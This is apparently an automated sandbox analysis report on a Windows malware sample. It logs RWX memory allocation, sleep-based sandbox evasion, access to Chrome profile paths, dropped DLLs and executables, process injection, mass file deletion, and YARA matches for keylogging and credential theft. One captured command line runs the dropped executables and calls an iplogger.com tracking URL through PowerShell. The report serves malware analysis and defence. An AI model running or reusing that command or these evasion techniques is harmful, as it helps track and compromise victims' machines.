NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02593000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02594000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02595000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02596000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02597000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02598000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02599000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a91000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a93000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a94000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a95000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a96000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a97000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a98000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a99000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a9a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a9b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a9c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a9d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a9e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a9f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (2 events)

description	Togwcstgxg.exe tried to sleep 150 seconds, actually delayed analysis time by 150 seconds
description	Yosdofwiqay.exe tried to sleep 225 seconds, actually delayed analysis time by 225 seconds

Steals private information from local Internet browsers (50 out of 93 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\43
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny\2022.9.20.1141
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\1.3.36.91
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Storage
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Thumbnails
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cache
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\52
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\JumpListIconsRecentClosed
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Download Service
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\7605
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\1.3.36.141
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\blob_storage
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\VideoDecodeStats
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny\2021.8.2.1142
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\1.0.6.0
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\2673
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\91.265.200
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\2018.8.8.0
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Code Cache
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\101.3.34.11
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\databases
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\4.10.2209.0
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\GCM Store
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\IndexedDB
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\File System
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl

Creates executable files on the filesystem (18 events)

file	C:\Users\test22\AppData\Local\Temp\nsk8999.tmp\UQ0ULUGAM6014M.dll
file	C:\Users\test22\AppData\Local\Temp\nsp774.tmp\UQ0ULUGAM6014M.dll
file	C:\Users\test22\AppData\Local\Temp\nsv3CD1.tmp\UQ0ULUGAM6014M.dll
file	C:\Users\test22\AppData\Local\Temp\nsjEDE6.tmp\UQ0ULUGAM6014M.dll
file	C:\Users\test22\AppData\Local\Temp\nsxD04C.tmp\UQ0ULUGAM6014M.dll
file	C:\Users\test22\AppData\Local\Temp\nswC0DB.tmp\UQ0ULUGAM6014M.dll
file	C:\Users\test22\AppData\Local\Temp\nsu20ED.tmp\UQ0ULUGAM6014M.dll
file	C:\Users\test22\AppData\Local\Temp\nslD9B2.tmp\UQ0ULUGAM6014M.dll
file	C:\Users\test22\AppData\Local\Temp\nsnC3F8.tmp\UQ0ULUGAM6014M.dll
file	C:\Users\test22\AppData\Local\Temp\nsiD095.tmp\UQ0ULUGAM6014M.dll
file	C:\Users\test22\AppData\Local\Temp\nsjC6E6.tmp\UQ0ULUGAM6014M.dll
file	C:\Users\test22\AppData\Local\Temp\Yosdofwiqay.exe
file	C:\Users\test22\AppData\Local\Temp\nsnE892.tmp\UQ0ULUGAM6014M.dll
file	C:\Users\test22\AppData\Local\Temp\nscDDB9.tmp\UQ0ULUGAM6014M.dll
file	C:\Users\test22\AppData\Local\Temp\nsvE432.tmp\UQ0ULUGAM6014M.dll
file	C:\Users\test22\AppData\Local\Temp\nsm677B.tmp\UQ0ULUGAM6014M.dll
file	C:\Users\test22\AppData\Local\Temp\nsb26.tmp\UQ0ULUGAM6014M.dll
file	C:\Users\test22\AppData\Local\Temp\nse54E8.tmp\UQ0ULUGAM6014M.dll

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline	"cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
cmdline	powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\Yosdofwiqay.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\nsnC3F8.tmp\UQ0ULUGAM6014M.dll

Checks for the Locally Unique Identifier on the system for a suspicious privilege (16 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW April 18, 2023, 5:31 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 18, 2023, 5:31 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 18, 2023, 5:31 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 18, 2023, 5:32 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 18, 2023, 5:32 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 18, 2023, 5:32 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 18, 2023, 5:32 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 18, 2023, 5:32 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 18, 2023, 5:32 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 18, 2023, 5:32 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 18, 2023, 5:32 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 18, 2023, 5:32 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 18, 2023, 5:33 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 18, 2023, 5:33 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 18, 2023, 5:33 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 18, 2023, 5:33 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Potentially malicious URLs were found in the process memory dump (3 events)

url	https://webbrowsertools.com/webgl-fingerprint/
url	http://nsis.sf.net/NSIS_Error
url	https://iplogger.com/1wjx55

Yara rule detected in process memory (50 out of 1045 events)

description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Steal credential	rule	local_credential_Steal
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Communications over P2P network	rule	Network_P2P_Win
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Escalate priviledges	rule	Escalate_priviledges
description	File Downloader	rule	Network_Downloader
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Take ScreenShot	rule	ScreenShot
description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Steal credential	rule	local_credential_Steal
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Communications over P2P network	rule	Network_P2P_Win
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Escalate priviledges	rule	Escalate_priviledges
description	File Downloader	rule	Network_Downloader
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active

Communicates with host for which no DNS query was performed (1 event)

host

23.95.97.22

Deletes a large number of files from the system indicative of ransomware, wiper malware or system destruction (50 out of 114 events)

file	C:\Users\test22\AppData\Local\Temp\nsa8870.tmp
file	C:\Users\test22\AppData\Local\Temp\nsk8999.tmp\UQ0ULUGAM6014M.dll
file	C:\Users\test22\AppData\Local\Temp\nsk8999.tmp
file	C:\Users\test22\AppData\Local\Temp\nscDDB9.tmp
file	C:\Users\test22\AppData\Local\Temp\nsnDDA9.tmp
file	C:\Users\test22\AppData\Local\Temp\nscDDB9.tmp\UQ0ULUGAM6014M.dll
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.1688.4922000
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.1688.4922000
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF4b1a70.TMP
file	C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1688.4922000
file	C:\Users\test22\AppData\Local\Temp\nsv3CD1.tmp
file	C:\Users\test22\AppData\Local\Temp\nse3A40.tmp
file	C:\Users\test22\AppData\Local\Temp\nsv3CD1.tmp\UQ0ULUGAM6014M.dll
file	C:\Users\test22\AppData\Local\Temp\nsm677B.tmp
file	C:\Users\test22\AppData\Local\Temp\nsm677B.tmp\UQ0ULUGAM6014M.dll
file	C:\Users\test22\AppData\Local\Temp\nsb669F.tmp
file	C:\Users\test22\AppData\Local\Temp\nsnC3F8.tmp
file	C:\Users\test22\AppData\Local\Temp\nshC3D7.tmp
file	C:\Users\test22\AppData\Local\Temp\nsnC3F8.tmp\UQ0ULUGAM6014M.dll
file	C:\Users\test22\AppData\Local\Temp\nswFFB8.tmp
file	C:\Users\test22\AppData\Local\Temp\nsb26.tmp
file	C:\Users\test22\AppData\Local\Temp\nsb26.tmp\UQ0ULUGAM6014M.dll
file	C:\Users\test22\AppData\Local\Temp\nstC6D5.tmp
file	C:\Users\test22\AppData\Local\Temp\nsjC6E6.tmp
file	C:\Users\test22\AppData\Local\Temp\nsjC6E6.tmp\UQ0ULUGAM6014M.dll
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.3760.4966328
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.3760.4966328
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF4bc69e.TMP
file	C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.3760.4966328
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2080.4919875
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF4b1214.TMP
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2080.4919875
file	C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2080.4919890
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2196.4925421
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF4b26b5.TMP
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2196.4925421
file	C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2196.4925421
file	C:\Users\test22\AppData\Local\Temp\nslD9B2.tmp
file	C:\Users\test22\AppData\Local\Temp\nslD9B2.tmp\UQ0ULUGAM6014M.dll
file	C:\Users\test22\AppData\Local\Temp\nswD9A2.tmp
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.3848.4987203
file	C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.3848.4987203
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF4c18e5.TMP
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.3848.4987203
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.3748.4950453
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.3748.4950250
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF4b880f.TMP
file	C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.3748.4950453
file	C:\Users\test22\AppData\Local\Temp\nse54E8.tmp
file	C:\Users\test22\AppData\Local\Temp\nsn4518.tmp

Resumed a suspended thread in a remote process potentially indicative of process injection (50 out of 64 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2124 resumed a thread in remote process 2192
Process injection	Process 2124 resumed a thread in remote process 2628
Process injection	Process 2268 resumed a thread in remote process 2332
Process injection	Process 2268 resumed a thread in remote process 2404
Process injection	Process 2524 resumed a thread in remote process 2768
Process injection	Process 2524 resumed a thread in remote process 2896
Process injection	Process 2992 resumed a thread in remote process 2348
Process injection	Process 2992 resumed a thread in remote process 2752
Process injection	Process 2804 resumed a thread in remote process 2952
Process injection	Process 2804 resumed a thread in remote process 2264
Process injection	Process 1020 resumed a thread in remote process 2776
Process injection	Process 1020 resumed a thread in remote process 1820
Process injection	Process 2848 resumed a thread in remote process 2504
Process injection	Process 2848 resumed a thread in remote process 2668
Process injection	Process 2224 resumed a thread in remote process 2072
Process injection	Process 2224 resumed a thread in remote process 368
Process injection	Process 3092 resumed a thread in remote process 3388
Process injection	Process 3092 resumed a thread in remote process 3576
Process injection	Process 3620 resumed a thread in remote process 3768
Process injection	Process 3620 resumed a thread in remote process 3888
Process injection	Process 3932 resumed a thread in remote process 3312
Process injection	Process 3932 resumed a thread in remote process 3492
Process injection	Process 3384 resumed a thread in remote process 3904
Process injection	Process 3384 resumed a thread in remote process 3172
Process injection	Process 1676 resumed a thread in remote process 3672
NtResumeThread April 18, 2023, 5:31 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2192	1	0	0
NtResumeThread April 18, 2023, 5:31 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2628	1	0	0
NtResumeThread April 18, 2023, 5:31 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2332	1	0	0
NtResumeThread April 18, 2023, 5:31 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2404	1	0	0
NtResumeThread April 18, 2023, 5:31 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2768	1	0	0
NtResumeThread April 18, 2023, 5:31 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2896	1	0	0
NtResumeThread April 18, 2023, 5:32 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2348	1	0	0
NtResumeThread April 18, 2023, 5:32 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2752	1	0	0
NtResumeThread April 18, 2023, 5:32 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2952	1	0	0
NtResumeThread April 18, 2023, 5:32 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2264	1	0	0
NtResumeThread April 18, 2023, 5:32 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2776	1	0	0
NtResumeThread April 18, 2023, 5:32 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 1820	1	0	0
NtResumeThread April 18, 2023, 5:32 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2504	1	0	0
NtResumeThread April 18, 2023, 5:32 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2668	1	0	0
NtResumeThread April 18, 2023, 5:32 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2072	1	0	0
NtResumeThread April 18, 2023, 5:32 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 368	1	0	0
NtResumeThread April 18, 2023, 5:32 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 3388	1	0	0
NtResumeThread April 18, 2023, 5:32 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 3576	1	0	0
NtResumeThread April 18, 2023, 5:32 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 3768	1	0	0
NtResumeThread April 18, 2023, 5:32 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 3888	1	0	0
NtResumeThread April 18, 2023, 5:32 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 3312	1	0	0
NtResumeThread April 18, 2023, 5:32 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 3492	1	0	0
NtResumeThread April 18, 2023, 5:32 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 3904	1	0	0
NtResumeThread April 18, 2023, 5:32 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 3172	1	0	0
NtResumeThread April 18, 2023, 5:32 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 3672	1	0	0

